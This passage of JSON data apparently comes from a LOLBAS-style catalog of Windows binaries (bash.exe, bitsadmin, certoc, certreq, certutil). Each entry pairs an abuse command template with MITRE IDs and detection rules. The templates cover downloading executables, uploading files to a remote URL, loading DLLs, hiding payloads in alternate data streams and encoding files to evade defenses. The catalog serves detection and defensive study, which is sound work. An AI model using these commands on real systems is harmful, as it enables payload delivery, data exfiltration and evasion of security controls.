Whitelisting.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"]},{"id":"lolbas:bash-exe:4","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe","description":"When executed, `bash.exe` queries the registry value of `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\MSI\\InstallLocation`, which contains a folder path (`c:\\program files\\wsl` by default). If the value points to another folder containing a file named `wsl.exe`, it will be executed instead of the legitimate `wsl.exe` in the program files folder.","usecase":"Execute a payload as a child process of `bash.exe` while masquerading as WSL.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"]},{"id":"lolbas:bitsadmin-exe:0","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"bitsadmin /create 1 bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\\data\\playfolder\\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1","description":"Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.","usecase":"Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"]},{"id":"lolbas:bitsadmin-exe:1","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\\data\\playfolder\\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1","description":"Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"]},{"id":"lolbas:bitsadmin-exe:2","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"bitsadmin /create 1 & bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset","description":"Command for copying cmd.exe to another folder","usecase":"Copy file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"]},{"id":"lolbas:bitsadmin-exe:3","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bitsadmin /create 1 & bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\\data\\playfolder\\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset","description":"One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.","usecase":"Execute binary file specified. Can be used as a defensive evasion.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"]},{"id":"lolbas:certoc-exe:0","toolId":"lolbas:certoc-exe","toolName":"CertOC.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll}","description":"Loads the target DLL file","usecase":"Execute code within DLL file","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\certoc.exe","c:\\windows\\syswow64\\certoc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml"},{"type":"IOC","value":"Process creation with given parameter"},{"type":"IOC","value":"Unsigned DLL load via certoc.exe"},{"type":"IOC","value":"Network connection via certoc.exe"}],"references":["https://twitter.com/sblmsrsn/status/1445758411803480072?s=20","https://twitter.com/sblmsrsn/status/1452941226198671363?s=20","https://lolbas-project.github.io/lolbas/Binaries/CertOC/"]},{"id":"lolbas:certoc-exe:1","toolId":"lolbas:certoc-exe","toolName":"CertOC.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certoc.exe -GetCACAPS {REMOTEURL:.ps1}","description":"Downloads text formatted files","usecase":"Download scripts, webshells etc.","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\certoc.exe","c:\\windows\\syswow64\\certoc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml"},{"type":"IOC","value":"Process creation with given parameter"},{"type":"IOC","value":"Unsigned DLL load via certoc.exe"},{"type":"IOC","value":"Network connection via certoc.exe"}],"references":["https://twitter.com/sblmsrsn/status/1445758411803480072?s=20","https://twitter.com/sblmsrsn/status/1452941226198671363?s=20","https://lolbas-project.github.io/lolbas/Binaries/CertOC/"]},{"id":"lolbas:certreq-exe:0","toolId":"lolbas:certreq-exe","toolName":"CertReq.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}","description":"Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument).","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certreq.exe","C:\\Windows\\SysWOW64\\certreq.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml"},{"type":"IOC","value":"certreq creates new files"},{"type":"IOC","value":"certreq makes POST requests"}],"references":["https://dtm.uk/certreq","https://lolbas-project.github.io/lolbas/Binaries/CertReq/"]},{"id":"lolbas:certreq-exe:1","toolId":"lolbas:certreq-exe","toolName":"CertReq.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE}","description":"Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.","usecase":"Upload","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certreq.exe","C:\\Windows\\SysWOW64\\certreq.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml"},{"type":"IOC","value":"certreq creates new files"},{"type":"IOC","value":"certreq makes POST requests"}],"references":["https://dtm.uk/certreq","https://lolbas-project.github.io/lolbas/Binaries/CertReq/"]},{"id":"lolbas:certutil-exe:0","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe}","description":"Download and save an executable to disk in the current folder.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"]},{"id":"lolbas:certutil-exe:1","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}","description":"Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\\Microsoft\\CryptnetUrlCache\\Content\\<hash>` when not.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"]},{"id":"lolbas:certutil-exe:2","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt","description":"Download and save a .ps1 file to an Alternate Data Stream (ADS).","usecase":"Download file from Internet and save it in an NTFS Alternate Data Stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"]},{"id":"lolbas:certutil-exe:3","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certutil.exe -URL {REMOTEURL:.exe}","description":"Download and save an executable to `%LOCALAPPDATA%low\\Microsoft\\CryptnetUrlCache\\Content\\<hash>`.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"]},{"id":"lolbas:certutil-exe:4","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Encode","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Encode"],"command":"certutil -encode {PATH} {PATH:.base64}","description":"Command to encode a file using Base64","usecase":"Encode files to evade defensive measures","mitre":["T1027.013"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"]},{"id":"lolbas:certutil-exe:5","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Decode","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Decode"],"command":"certutil -decode {PATH:.base64} {PATH}","description":"Command to decode a Base64 encoded file.","usecase":"Decode files to evade defensive measures","mitre":["T1140"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"]},{"id":"lolbas:certutil-exe:6","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Decode","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Decode"],"command":"certutil -decodehex {PATH:.hex} {PATH}","description":"Command to decode a hexadecimal-encoded file.","usecase":"Decode files to evade defensive 